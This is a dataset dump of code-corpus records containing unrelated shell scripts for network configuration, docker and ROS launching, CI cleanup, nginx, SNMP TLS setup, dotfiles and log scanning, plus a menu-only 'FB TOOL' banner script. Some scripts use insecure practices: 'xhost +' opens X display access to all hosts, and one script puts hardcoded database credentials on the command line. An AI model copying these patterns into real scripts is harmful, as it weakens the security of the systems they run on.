blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
33f7f8132de1692d326ad18e333ae0028ed70544
|
Shell
|
m23project/m23
|
/m23/bin/networkCheckSetDialog
|
UTF-8
| 1,932
| 4.3125
| 4
|
[] |
no_license
|
#!/bin/bash
# Checks network settings and asks for correct values for the override files
#name checkIPAskForAlternative
#description Checks, if an FQDN, IP or netmask is valid and asks the administrator for a valid
#parameter: $1 text
#parameter: name of the override file
#parameter: true, if FQDN is allowed, otherwise false.
checkIPAskForAlternative()
{
backtitle='m23 network configuration for m23 clients'
title="$1"
# Bilingual (English/German) prompt shown in the dialog box; runtime text, unchanged.
text="Invalid configuration found! Please enter a valid value.
Hint: This tool does not change the network configuration ON the m23 server.
Here you set network settings for m23 clients.
Ungueltige Konfiguration gefunden! Bitte geben Sie eine gueltigen Wert ein.
Hinweise: Hiermit aendern Sie NICHT die Netzwerkkonfiguration des m23-Servers,
sondern die der m23-Clients."
confFile="$2"
allowFQDN="$3"
export retCode=1
# Re-prompt until the entered value passes validation (retCode becomes 0).
while [ $retCode -ne 0 ]
do
# Build a one-shot script that runs dialog(1) with the prompt text and captures
# the typed value in /tmp/dialog.value. The nested backticked echos exist to get
# the single-quoting of $backtitle/$title/$text right inside the generated file.
echo "dialog --backtitle `echo \"'$backtitle'\"` --title `echo \"'$title'\"` --clear --inputbox `echo \"'$text'\"` 20 75 \"\" 2> /tmp/dialog.value; exit \$?" > /tmp/dialog.cmd
bash /tmp/dialog.cmd
RET="$(cat /tmp/dialog.value)"
# Accept an IP always; accept an FQDN only when $allowFQDN is the literal
# command "true" (it is executed, so true/false strings act as booleans).
/m23/bin/checkIP "$RET" || ( /m23/bin/checkFQDN "$RET" && $allowFQDN )
export retCode=$?
# The (possibly still invalid) value is written each round; the final loop
# iteration leaves the validated value in the override file.
echo -n "$RET" > "$confFile"
done
}
# Validate each server setting; on failure ask the admin for a replacement
# that is stored in the matching /m23/etc/*.override file.
/m23/bin/checkIP "`/m23/bin/serverInfoDNS`"
if [ $? -ne 0 ]
then
checkIPAskForAlternative "DNS server/DNS-Server" "/m23/etc/dns.override" false
fi
IP="`/m23/bin/serverInfoIP`"
# The server address may be an FQDN, so both checks are allowed here.
/m23/bin/checkIP "$IP" || /m23/bin/checkFQDN "$IP"
if [ $? -ne 0 ]
then
checkIPAskForAlternative "IP address/IP-Adresse" "/m23/etc/address.override" true
fi
/m23/bin/checkIP "`/m23/bin/serverInfoGateway`"
if [ $? -ne 0 ]
then
checkIPAskForAlternative "Gateway server/Gateway-Server" "/m23/etc/gateway.override" false
fi
/m23/bin/checkIP "`/m23/bin/serverInfoBroadcast`"
if [ $? -ne 0 ]
then
checkIPAskForAlternative "Broadcast address/Broadcast-Adresse" "/m23/etc/broadcast.override" false
fi
| true
|
1f303a8501b55537d65c46cc94eb0b84b2075274
|
Shell
|
ghsecuritylab/trabajo-final-cese-robot
|
/docker/run_docker.sh
|
UTF-8
| 761
| 2.578125
| 3
|
[] |
no_license
|
# Launch the ROS Kinetic development container with X11 access, host
# networking, and this repository mounted into the catkin workspace.
SCRIPTS_DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
# Repository root = parent directory of this script.
REPO_DIR=`readlink -f ${SCRIPTS_DIR}/..`
# Host IPC plus capabilities needed for locked memory and RT scheduling.
DOCKER_CAPABILITIES="--ipc=host \
--cap-add=IPC_LOCK \
--cap-add=sys_nice"
DOCKER_NETWORK="--network=host"
# X11 socket (for GUI tools) and the repo mounted as a catkin package.
DOCKER_MOUNT_ARGS="\
-v /tmp/.X11-unix:/tmp/.X11-unix:rw \
-v ${REPO_DIR}:/catkin_ws/src/tesis-bot"
# Direct rendering device for hardware-accelerated graphics.
DOCKER_GRAPHICS_FLAG="--device /dev/dri"
# NOTE(review): "xhost +" disables X access control for ALL hosts while the
# container runs; "xhost +local:docker" would be a narrower grant.
xhost +
docker run --privileged --rm \
${DOCKER_CAPABILITIES} \
${DOCKER_MOUNT_ARGS} \
-v /etc/fstab:/etc/fstab:ro \
-e ROS_HOSTNAME=localhost \
-e ROS_MASTER_URI=http://localhost:11311 \
${DOCKER_GRAPHICS_FLAG} \
${DOCKER_NETWORK} \
-e DISPLAY=${DISPLAY} \
-it ros-kinetic-dev
# Restore X access control once the interactive container exits.
xhost -
| true
|
5761edc6c68670f6174cec5d7baa2312e2f7c733
|
Shell
|
elastest/elastest-torm
|
/docker/services/testlink/app-entrypoint.sh
|
UTF-8
| 322
| 2.75
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -e
# Bitnami TestLink container entrypoint: initialize the stack on first
# start, then hand control to tini running the requested command.
# NOTE: the -e in the shebang is lost if this file is run as "bash <script>";
# it only applies when executed directly.
. /opt/bitnami/base/functions
. /opt/bitnami/base/helpers
print_welcome_page
# Update check runs in the background so it does not delay startup.
check_for_updates &
# Only initialize apache/php/testlink when invoked as the container's
# start command (either "nami start ..." or the /init.sh wrapper).
if [[ "$1" == "nami" && "$2" == "start" ]] || [[ "$1" == "/init.sh" ]]; then
nami_initialize apache php testlink
info "Starting testlink... "
fi
# Remove the web installer so it cannot be re-run on a provisioned instance.
rm -rf /opt/bitnami/testlink/install/
# tini acts as a minimal init/reaper and execs the requested command.
exec tini -- "$@"
| true
|
79bafe6794bf1183757763ffb2dcf41f397f6fc4
|
Shell
|
OpenDataAnalytics/kitware-geospatial-recipes
|
/recipes/texture-atlas/build.sh
|
UTF-8
| 522
| 2.953125
| 3
|
[] |
permissive
|
#!/bin/bash
# Build and install Texture_Atlas with CMake + Ninja into ${PREFIX}
# (conda-build style install prefix, provided by the build environment).
#
# Fixes over the original:
#  * set -e so a failed mkdir/cd/cmake aborts instead of letting later
#    steps run from the wrong directory.
#  * mkdir -p makes the script safe to re-run.
#  * POSIX "=" comparison and quoted $(uname) in the test.
set -e

# Out-of-source build directory.
mkdir -p build
cd build

BUILD_CONFIG=Release

# macOS: force libc++ and pad Mach-O headers so install names can be
# rewritten after installation.
if [ "$(uname)" = "Darwin" ]; then
    export CXXFLAGS="${CXXFLAGS} -stdlib=libc++"
    export LDFLAGS="${LDFLAGS} -headerpad_max_install_names"
fi

cmake ../Texture_Atlas/src/ -G "Ninja" \
    -Wno-dev \
    -DCMAKE_BUILD_TYPE="$BUILD_CONFIG" \
    -DCMAKE_PREFIX_PATH:PATH="${PREFIX}" \
    -DCMAKE_INSTALL_PREFIX:PATH="${PREFIX}" \
    -DCMAKE_INSTALL_RPATH:PATH="${PREFIX}/lib" \
    -DCMAKE_OSX_DEPLOYMENT_TARGET:STRING="10.9"

# compile & install!
ninja install
| true
|
33f2403199907f61250dffaef464d0d2b2ad3be3
|
Shell
|
AMIS-Services/code-cafe-20190520
|
/laptop-as-code/dotfiles/bin/resource_usage.sh
|
UTF-8
| 879
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/sh
# Print a quick resource-usage report: CPU (top), top memory consumers (ps),
# virtual memory statistics (vmstat) and listening/open sockets (netstat).
# Each tool is probed with -x first so the script degrades gracefully.
OS=`uname`
BIN_TOP=/bin/top
if [ -x ${BIN_TOP} ]; then
echo "CPU Usage:"
# -b = batch mode, -n 1 = single snapshot (GNU top flags).
${BIN_TOP} -b -n 1
fi
BIN_PS=/bin/ps
if [ -x ${BIN_PS} ]; then
echo "Top Memory Usage:"
# Sort by %MEM (numeric column 4), highest first, show the top ten.
${BIN_PS} aux | sort -r -nk 4 | head
fi
VMSTAT=/usr/bin/vmstat
if [ -x ${VMSTAT} ]; then
echo ""
echo "Virtual Memory Info:"
if [ "${OS}" = "FreeBSD" ]; then
${VMSTAT} 1 3
else
# GNU vmstat: use -t (built-in timestamps) when supported; otherwise
# bracket the run with date(1) calls for a manual timestamp.
HAS_TIMESTAMP=`${VMSTAT} --help 2>&1 | grep -c '\-t'`
if [ "${HAS_TIMESTAMP}" = "0" ]; then
date
${VMSTAT} -w 1 3
date
else
${VMSTAT} -tw 1 3
fi
fi
fi
NETSTAT=/usr/bin/netstat
if [ -x ${NETSTAT} ]; then
echo ""
echo "Network Info:"
# NOTE(review): -p (owning PID) is a Linux netstat flag; it means something
# different on BSD netstat — confirm if the FreeBSD branch matters here too.
${NETSTAT} -anlp
fi
| true
|
6603cd7e19a37ab8acff37a649818423491f42ea
|
Shell
|
BadderZman/Fbnewtool2020
|
/fbtool.sh
|
UTF-8
| 1,452
| 2.890625
| 3
|
[] |
no_license
|
# FB TOOL — interactive banner/menu front-end.
#
# Fixes over the original:
#  * removed the stray trailing `done` (there was no matching loop), which
#    made the whole script a bash syntax error and unrunnable.
#  * menu selection uses `case` instead of `[ $ch -eq 1 ]`, so empty or
#    non-numeric input no longer crashes test(1).
clear
echo
echo
# .password.py presumably gates access with a password prompt — TODO confirm.
python .password.py
echo
echo
clear
echo -e "\e[4;31m Kareem Musa !!! \e[0m"
echo -e "\e[1;34m Presents \e[0m"
echo -e "\e[1;32m FB TOOL \e[0m"
echo "Press Enter To Continue"
read a1
clear
echo -e "\e[1;31m"
figlet FB TOOL
echo -e "\e[1;34m Created By \e[1;32m"
toilet -f mono12 -F border B.C.M
echo -e "\e[4;34m This TOOL Was Created By Kareem Musa \e[0m"
echo -e "\e[1;34m For Any Queries Mail Me!!!\e[0m"
echo -e "\e[1;32m Mail: legends.and.criminals@gmail.com \e[0m"
echo -e "\e[4;32m FB Page: https://www.facebook.com/c/kareeemMusa \e[0m"
echo " "
echo -e "\e[4;31m Please Read Instruction Carefully !!! \e[0m"
echo " "
echo "------------------ "
echo "|Press 1| MENU| "
echo "|----------------| "
echo "|Press 2| Exit| "
echo "------------------ "
echo
echo
echo
echo
read ch
case "$ch" in
  1)
    # Open the main menu helper.
    clear
    echo -e "\e[1;32m"
    bash .help.sh
    exit 0
    ;;
  2)
    # Exit with the credits banner.
    clear
    echo -e "\e[1;31m"
    figlet FB TOOL
    echo -e "\e[1;34m Created By \e[1;32m"
    toilet -f mono12 -F border B.C.M
    echo -e "\e[1;34m For Any Queries Mail Me!!!\e[0m"
    echo -e "\e[1;32m Mail: legends.and.criminals@gmail.com \e[0m"
    echo -e "\e[1;32m Facebook: https://m.facebook.com/KareeemMusa \e[0m"
    echo -e "\e[4;32m Special Thanks To KareemMusa \e[0m"
    echo " "
    exit 0
    ;;
  *)
    # Anything else: show the error banner and return "home".
    echo -e "\e[4;32m Invalid Input !!! \e[0m"
    toilet -f mono12 -F border KAREEM
    toilet -f mono12 -F border +
    toilet -f mono12 -F border MUSA
    echo "Press Enter To Go Home"
    read a3
    clear
    cd ..
    cd home
    ;;
esac
| true
|
2313d94708835038554477bdc71da41ab46eab98
|
Shell
|
akuru/UbuntuSinhalaFont
|
/install.sh
|
UTF-8
| 774
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
# Install Noto fonts and replace the system non-latin fontconfig rules with
# the Sinhala-friendly config from the IMS94/UbuntuSinhalaFont repository.
# Install Noto Fonts
sudo apt install -y fonts-noto fontconfig
# Download font config
# (skipped when a local 65-nonlatin.conf already exists in the cwd)
if [ ! -f 65-nonlatin.conf ]; then
echo "Downloading font config"
wget https://raw.githubusercontent.com/IMS94/UbuntuSinhalaFont/master/65-nonlatin.conf
fi
# Move existing non-latin config
# One-time backup: a second run won't clobber the original .bak.
if [ ! -f /etc/fonts/conf.avail/65-nonlatin.conf.bak ]; then
echo "Backing up existing configuration"
sudo mv /etc/fonts/conf.avail/65-nonlatin.conf /etc/fonts/conf.avail/65-nonlatin.conf.bak
fi
# Move downloaded config to font configs
echo "Updating font config"
sudo mv 65-nonlatin.conf /etc/fonts/conf.avail/65-nonlatin.conf
# Reload font cache
# -r forces a full re-scan so the new rules take effect.
echo "Reloading font cache"
fc-cache -r
echo "All Done! Please restart your machine for updated fonts to take effect"
| true
|
2a5f75f40dc00bae4801c19bd41f611d5bfd5b67
|
Shell
|
igormalyk/dotfiles
|
/install.sh
|
UTF-8
| 1,062
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
# Bootstrap dotfiles: symlink every "_<name>" file in this repo to
# "~/.<name>", backing up any pre-existing dotfile of the same name.
echo "### Starting .dotfiles setup"
# ~/.dotfiles is used purely as an "already bootstrapped" flag file.
if [ -e ~/.dotfiles ]
then
echo "### ERROR: Already bootstrapped dotfiles."
exit 0
fi
if [ -d ~/.dotfiles_backup ]
then
echo "OK: Backup directory exists."
else
echo "OK: Creating ~/.dotfiles_backup directory."
mkdir ~/.dotfiles_backup
fi
echo "# Looking home dir for existing dotfiles with the same name"
# Repo files are named "_<name>"; cut strips the leading underscore.
# NOTE(review): the backticked find + word splitting breaks on names with
# spaces or additional underscores — acceptable for typical dotfile names.
for file in `find _* -type f | cut -d _ -f 2` ;
do
if [ -e ~/."$file" ]
then
# Existing dotfile: preserve it in the backup dir before linking.
echo "OK: Found .$file"
mv ~/."$file" ~/.dotfiles_backup/
echo "OK: Backed up .$file"
ln -s $PWD/_"$file" ~/."$file"
echo "OK: Symlinked .$file"
else
ln -s $PWD/_"$file" ~/."$file"
echo "OK: Symlinked new .$file"
fi
done
echo "# Backed up dotfiles (if any) will be located in ~/.dotfiles_backup"
touch ~/.dotfiles
echo "OK: Created a flag file."
# Re-source the user's shell profile so the new dotfiles take effect now.
if [ -e ~/.bash_profile ]
then
echo "OK: Reloading .bash_profile"
source ~/.bash_profile
else
echo "OK: Reloading .bashrc"
source ~/.bashrc
fi
echo "### Setup complete"
| true
|
fd5eb1e67cfadd40687b083a0d71e42dff0c8735
|
Shell
|
wilson-tim/stellahomedw
|
/DWLIVE/jutil/process_check/process_check.ksh
|
UTF-8
| 3,059
| 3.59375
| 4
|
[] |
no_license
|
#!/usr/bin/ksh
#set -x
# *******************************************************************
# * PROCESS CHECKING ROUTINE *
# *******************************************************************
# * *
# * This shell script is called with three parameters, *
# * Parameter 1 - Time in seconds between each loop *
# * Parameter 2 - Number of times round loop *
# * Parameter 3 - User name used in process call *
# * *
# * Example Call *
# * process_check.ksh 900 20 dw *
# * This will perform the checks, wait for 900 seconds (15 minutes) *
# * and run for a total of 5 hours (15 minutes * 20), it will check *
# * the processes running against user dw *
# * *
# *******************************************************************
. /home/dw/bin/set_oracle_variables.ksh
# *******************************************************************
# * DECLARE VARIABLES *
# *******************************************************************
sleep_time=$1
num_loops=$2
username=$3
app_dir=/home/dw/DWLIVE/process_check
log_dir=/home/dw/DWLIVE/logs/process_check
# *******************************************************************
# * PROGRAM START *
# *******************************************************************
# Get Date Information from Oracle
# NOTE(review): database credentials (dw/dbp) are hardcoded on the command
# line below and visible via ps — consider an external wallet/credential.
# ksh runs the LAST stage of a pipeline in the current shell, so the
# "read a b" really does set $a/$b here (this idiom would NOT work in bash).
sqlplus -s dw/dbp<<Rob_S|read a b
set pagesize 0
set echo off
set heading off
set feedback off
set verify off
select
to_char(sysdate,'Dy'),
to_char(trunc(sysdate),'yyyymondd')
from dual;
exit
Rob_S
export day_stamp=${a}
export date_stamp=${b}
# Create empty log files
# (Fix: this line was missing its '#' marker, so every run tried to execute
# a command named "Create" and printed a "not found" error.)
process_file=${log_dir}/process_check.${day_stamp}_${date_stamp}
session_file=${log_dir}/session_check.${day_stamp}_${date_stamp}
>${process_file}
>${session_file}
#Beginning 19:30 loop at 15 minute intervals until 00:30
(( k=0 ))
while [[ k -le ${num_loops} ]]
do
# Fetch the current DB time; same ksh last-pipeline-stage trick sets $a.
sqlplus -s dw/dbp<<Rob_S2|read a
set pagesize 0
set echo off
set heading off
set feedback off
set verify off
select
to_char(sysdate,'hh24:mi:ss')
from dual;
exit
Rob_S2
export time_stamp=${a}
# Snapshot this user's processes, filtering out our own helper commands.
echo k=${k} Time=${time_stamp}>>${process_file}
ps -fu${username}|sort -k5|grep -v sort|grep -v "sleep"|grep -v "ps -fudw"|grep -v process_check>>${process_file}
echo "__/\__/\__/\__">>${process_file}
echo " ">>${process_file}
echo k=${k} Time=${time_stamp}>>${session_file}
# "sessions" is an external helper/alias — presumably dumps DB sessions;
# TODO confirm where it is defined (likely set_oracle_variables.ksh).
sessions>>${session_file}
echo "__/\__/\__/\__">>${session_file}
echo " ">>${session_file}
(( k = k+1 ))
sleep ${sleep_time}
done
# Housekeeping: remove process_check logs older than 30 days.
cd ${log_dir}
for delfiles in `find ${log_dir} -name "*" -mtime +30`
do
rm ${delfiles}
done
| true
|
f7cea5049dc5df321eeae6f8257215ecc6eece11
|
Shell
|
michelleirvine/bazel-toolchains
|
/container/debian8-clang-fully-loaded/build.sh
|
UTF-8
| 2,663
| 3.78125
| 4
|
[
"Apache-2.0"
] |
permissive
|
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env bash
set -e
# Print the CLI usage/help text for this build script to stdout.
show_usage () {
usage=$(cat << EOF
Usage: build.sh [options]
Builds the fully-loaded container using Google Cloud Container Builder.
Required options:
-p|--project GCP project ID
-c|--container docker container name
-t|--tag docker tag for the image
Optional options:
-a|--async asynchronous execute Cloud Container Builder
For example, running:
$ build.sh -p my-gcp-project -c debian8-clang-fully-loaded -t latest
will produce docker images:
gcr.io/my-gcp-project/debian8-clang-fully-loaded:latest
EOF
)
echo "$usage"
}
#######################################
# Parse command-line flags into globals.
# Globals (written): PROJECT, CONTAINER, TAG, ASYNC
# Arguments: the script's CLI arguments
# Exits: 0 after -h/--help; 1 on unknown flag or missing required option.
#
# Fix: show_usage advertises "-t|--tag" but the case statement only
# matched "--docker-tag"; both long spellings are now accepted.
#######################################
parse_parameters () {
  while [[ $# -gt 0 ]]; do
    case "$1" in
      -h|--help)
        show_usage
        exit 0
        ;;
      -p|--project)
        shift
        PROJECT=$1
        shift
        ;;
      -c|--container)
        shift
        CONTAINER=$1
        shift
        ;;
      -t|--tag|--docker-tag)
        shift
        TAG=$1
        shift
        ;;
      -a|--async)
        # Extra spaces are intentional: ASYNC is splice-expanded unquoted
        # into the gcloud command line.
        ASYNC=" --async "
        shift
        ;;
      *)
        echo "Unknown argument $1"
        show_usage
        exit 1
        ;;
    esac
  done
  # All three of project/container/tag are mandatory.
  if [[ "$PROJECT" == "" || "$CONTAINER" == "" || "$TAG" == "" ]]; then
    echo "Please specify all required options"
    show_usage
    exit 1
  fi
}
#######################################
# Entry point: parse flags, point gcloud at the project and submit the
# container build to Google Cloud Container Builder.
# Globals (read): PROJECT, CONTAINER, TAG, ASYNC (set by parse_parameters)
#
# Fix: "$@" is now quoted (main $@ / parse_parameters $@ broke arguments
# containing spaces), and path expansions are quoted.
#######################################
main () {
  parse_parameters "$@"
  # Setup GCP project id for the build
  gcloud config set project "${PROJECT}"
  PROJECT_ROOT=$(git rev-parse --show-toplevel)
  DIR="container/debian8-clang-fully-loaded"
  # We need to start the build from the root of the project, so that we can
  # mount the full root directory (to use bazel builder properly).
  cd "${PROJECT_ROOT}"
  # We need to run clean to make sure we don't mount local build outputs
  bazel clean --async
  # Start Google Cloud Container Builder.
  # ${ASYNC} is deliberately unquoted: it is either empty or " --async ".
  gcloud container builds submit . \
    --config="${PROJECT_ROOT}/container/debian8-clang-fully-loaded/cloudbuild.yaml" \
    --substitutions _PROJECT="${PROJECT}",_CONTAINER="${CONTAINER}",_TAG="${TAG}",_DIR="${DIR}" \
    ${ASYNC}
}
main "$@"
| true
|
419435546ef9720744fcb27b43685b599a779c93
|
Shell
|
lucas101199/MapMaking
|
/mapper.sh
|
UTF-8
| 748
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
# Example script for calling mapper. Don't forget to make it executable (chmod +x mapper)
# Change the last line (java Mapper ...) to suit your needs
# Author: Ola Ringdahl
#
# Inputs:
# url specifies the address and port to the machine running MRDS.
# x1, y1, x2, y2 give the coordinates of the lower left and upper right corners of the area the robot should explore and map.
# showGUI: 1 should show the map, 0 should not
if [ "$#" -ne 6 ]; then
echo "Usage: ./mapper url x1 y1 x2 y2 showGUI"
# NOTE(review): bare "exit" exits with echo's status (0), so callers cannot
# detect the usage error; "exit 1" would be more conventional here.
exit
fi
url="$1"
x1="$2"
y1="$3"
x2="$4"
y2="$5"
showGUI="$6"
# Compile the code (-cp .:/lib/* includes the Jackson .jar files)
javac -cp .:lib/* *.java
# Run the program
# NOTE(review): the variables are expanded unquoted; fine for numeric
# coordinates, but quote them if the URL may contain spaces/glob chars.
java -cp .:./lib/* Mapper $url $x1 $y1 $x2 $y2 $showGUI
| true
|
15b0b741599694ca35b9bc01bc5dc0231faf71a2
|
Shell
|
corpusops/fix_gitlab_runner
|
/roles/fix_gitlabrunner_perms/templates/root/fix_ci_docker_perms.sh
|
UTF-8
| 1,081
| 3.515625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Remove gitlab-runner docker cache containers and the volumes they mount.
# Set DRYRUN to any non-empty value to only print the docker commands.
# add to [[runner]]
# pre_clone_script = "umask 0022"
# then cleanup runner caches & volumes
DRYRUN=${DRYRUN-}
VOLUMEPATTERN="${VOLUMEPATTERN:-gitlab.*runner}"
JQ="jq -M"
# Echo a command to stderr, then execute it.
vv() {
echo "$@">&2
"$@"
}
# Echo a command to stderr; execute it only when DRYRUN is empty.
drvv() {
echo "$@">&2
if [[ -z $DRYRUN ]];then
"$@"
fi
}
# All container IDs whose listing matches "runner...cache".
RUNNER_CACHE_CONTAINERS=$( docker ps -a | egrep "runner.*cache" | awk '{print $1}'; )
RUNNER_VOLUMES=""
# clean docker cache containers
for i in $RUNNER_CACHE_CONTAINERS;do
infos="$(docker inspect $i)"
if ( echo "$infos" | $JQ .[0].Mounts | egrep -q "$VOLUMEPATTERN" );then
# NOTE(review): declare -a with a command-substitution string stores the
# whole JSON array in mounts[0], so this inner loop runs once over the full
# array and .[0].Destination/.[0].Name only ever look at the FIRST mount —
# confirm whether containers with several matching mounts need more.
declare -a mounts="$( echo "$infos" | $JQ .[0].Mounts )"
for m in "${mounts[@]}";do
if ( echo "$m" | $JQ .[0].Destination | egrep -q "$VOLUMEPATTERN" );then
RUNNER_VOLUMES="$RUNNER_VOLUMES $( echo "$m" | $JQ .[0].Name -r)"
fi
done
fi
done
# clean docker volumes
for i in $RUNNER_CACHE_CONTAINERS;do
drvv docker rm -f $i
done
for i in $RUNNER_VOLUMES;do
drvv docker volume rm -f $i
done
# vim:set et sts=4 ts=4 tw=80:
| true
|
7cf5a8c20c4b5837beb7c01e8871644721e28ccf
|
Shell
|
alex-suess/dotfiles
|
/yarn/install.sh
|
UTF-8
| 170
| 3.21875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
#
# This installs yarn via homebrew
#
# Fix: `read -p` is a bash extension; under a POSIX /bin/sh (e.g. dash) it
# errors out, leaving the answer unset and silently skipping the install.
# The prompt is printed with printf and the reply read portably with -r.
printf "Do you wish to install yarn? [y/n]"
read -r yn
case "$yn" in
Y|y )
brew update
brew install yarn
esac
| true
|
2a1de4a9457cee975ecca392f8c196599c6d3f2b
|
Shell
|
ntujvang/holbertonschool-sysadmin_devops
|
/0x09-web_server/4-not_found_page_404
|
UTF-8
| 412
| 3
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Script that redirects to 404
# Installs nginx and wires a custom 404 page into the default site config.
sudo apt-get install -y nginx
# Write the custom 404 body (tee so the write happens with root rights).
echo "Ceci n'est pas une page" | sudo tee /usr/share/nginx/html/custom_404.html
# Config fragment: serve /custom_404.html for 404s, internal-only location.
string="error_page 404 /custom_404.html;\\n location = /custom_404.html {\\n root /usr/share/nginx/html;\\n internal;\\n}"
# NOTE(review): $mine is assigned but never used below.
mine="#error_page 404 /404.html;"
loc="/etc/nginx/sites-enabled/default"
# NOTE(review): inserting at hardcoded line 26 assumes the stock
# Debian/Ubuntu default-site layout — fragile if the file changes.
sudo sed -i "26i $string" $loc
sudo service nginx start
| true
|
58d1ca6ceb0e07dd2e7a47a0bb24700ccdcb45e5
|
Shell
|
Mattlk13/maglev
|
/lib/ruby/1.9/openssl/ext/missing.sh
|
UTF-8
| 258
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/sh
# For every HAVE_<SYMBOL> guard referenced in openssl_missing.c, report
# whether the bundled libssl dylib actually exports that symbol.
for i in `grep '#if !defined(HAVE_' openssl_missing.c | sed -e 's/\#if\ \!defined(HAVE_//' -e 's/).*//' `
do
# nm lists the library's symbol table; grep -qi = quiet, case-insensitive.
if nm ../../../../../gemstone/lib/libssl*.dylib | grep -qi "$i"
then
echo Has $i;
else
echo Doesnt have $i;
fi
done
| true
|
ff8c6d6d01c3af592ad0d5139436d86e840cb002
|
Shell
|
joseflorida/sistemas
|
/script1.sh
|
UTF-8
| 177
| 3.34375
| 3
|
[] |
no_license
|
# Compare two integers and report the larger one (or that they are equal).
# Usage: script1.sh NUM1 NUM2
#
# Fixes over the original:
#  * operands are quoted, so a missing argument no longer produces a
#    cryptic test(1) error.
#  * the nested "else if ... fi fi fi" ladder is a single if/elif chain.
compare_numbers() {
    x=$1
    y=$2
    if [ "$x" -gt "$y" ]; then
        echo "El mayor es:$x"
    elif [ "$y" -gt "$x" ]; then
        echo "El mayor es:$y"
    elif [ "$x" -eq "$y" ]; then
        echo "Son iguales"
    fi
}

# Preserve the original CLI behaviour: compare the first two arguments.
if [ $# -ge 2 ]; then
    compare_numbers "$1" "$2"
else
    echo "Usage: $0 NUM1 NUM2" >&2
fi
| true
|
bab1e8dad0a37d196c6f65fba06386be3baf64fc
|
Shell
|
LeandroGuillen/sta
|
/escenario/SNMP/SNMP-Configure.sh
|
UTF-8
| 1,537
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
# Configure this host as either an SNMP agent (snmpd) or manager (snmptrapd),
# installing the TLS keys/certificates each role needs. Prompts are in
# Spanish; comments below were translated to English.
user=`whoami`
directory=`pwd`
# Must run as root: writes /etc/hosts and /usr/local/share/snmp.
if [ "$user" != "root" ]; then
echo "$user is not an administrator"
exit 1
fi
cd $HOME
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib
# Prompt: agent (snmpd) or manager (trapd)?
echo -n '¿Agente (snmpd) o manejador (trapd)? (a/m): '
read var1
if [ "$var1" == "a" ]; then
# Manager IP to which traps will be sent; registered in /etc/hosts.
echo -n "Ip del manejador para enviar traps: "
read ipManejador
echo "$ipManejador manejador.com" >> /etc/hosts
cp $directory/snmpd.conf .
# Create the directory hierarchy for the keys and certificates:
# /usr/local/shared/snmpd/tls
cp -r $directory/tlsagente/tls /usr/local/share/snmp
# Restrict permissions on agente.key and agente.crt
chmod 600 /usr/local/share/snmp/tls/private/agente.key
chmod 600 /usr/local/share/snmp/tls/certs/agente.crt
# Start the agent in the foreground on UDP 161 plus TLS/DTLS 10161.
snmpd -r -u alumno -f -Leo -c $HOME/snmpd.conf udp:161 tlstcp:10161 dtlsudp:10161
else # Configure the manager
# If the TLS directory does not exist (we are not on the same box as the agent)
if [ ! -d "/usr/local/share/snmp/tls" ]; then
cp -r $directory/tlsmanejador/tls /usr/local/share/snmp
else
# Copy only the keys
cp $directory/tlsmanejador/tls/private/manejador.key /usr/local/share/snmp/tls/private
fi
# Restrict permissions on manejador.key and manejador.crt
chmod 600 /usr/local/share/snmp/tls/private/manejador.key
chmod 600 /usr/local/share/snmp/tls/certs/manejador.crt
cp $directory/snmptrapd.conf .
# Agent IP, registered in /etc/hosts as agente.com.
echo -n "Ip del agente ( x.x.x.x agente.com en hosts): "
read ipAgente
echo "$ipAgente agente.com" >> /etc/hosts
# Start the trap receiver in the foreground.
snmptrapd -f -Leo -c snmptrapd.conf
fi
| true
|
9967b192161d8233a8f889dcd21123294c328b4e
|
Shell
|
kva-devops/bash_scripts
|
/pull-messagese.sh
|
UTF-8
| 838
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
# Author: Kutiavin Vladimir
# Date: 11/02/21
# Description: Scan logs file and find line what you need
#
# Fixes over the original:
#  * read -r plus break on EOF — the original busy-looped forever once
#    stdin was closed (read kept failing but the loop never exited).
#  * menu strings are quoted so the trailing "?" is not glob-expanded.
#  * removed the unreachable "grep -i error messages" after the loop.

# Work on a local copy of the syslog so later greps don't need root.
sudo cp /var/log/messages .
sudo chown vagrant:vagrant messages

while true
do
    echo "What messages you want pull?"
    echo
    echo "Press 1 for pull error messages"
    echo "Press 2 for pull warn messages"
    echo "Press 3 for pull fail messages"
    echo "Press 0 for pull error, warn and fail messages"
    echo "Press f for create files with error, warn and fail messages"
    echo "Press q for exit"
    echo
    read -r result || break
    case $result in
        1) grep -i error messages;;
        2) grep -i warn messages;;
        3) grep -i fail messages;;
        0) grep -i -e error -e warn -e fail messages;;
        f) grep -i -e error -e warn -e fail messages > errorWarnFailMessages.txt
           echo "File create";;
        q|Q|exit) exit 0;;
        *) echo "Invalid choises"
    esac
done
| true
|
2f55ea659ba758a97f289962eaf08e12f5ce722a
|
Shell
|
GaryniL/AQC111_DSM
|
/enableAQC111.sh
|
UTF-8
| 2,254
| 3.8125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#title :enableAQC111.sh
#description :This script will make aqc111 driver enable in DSM 6.2.
#author :garynil.tw
#date :20200608
#version :0.1
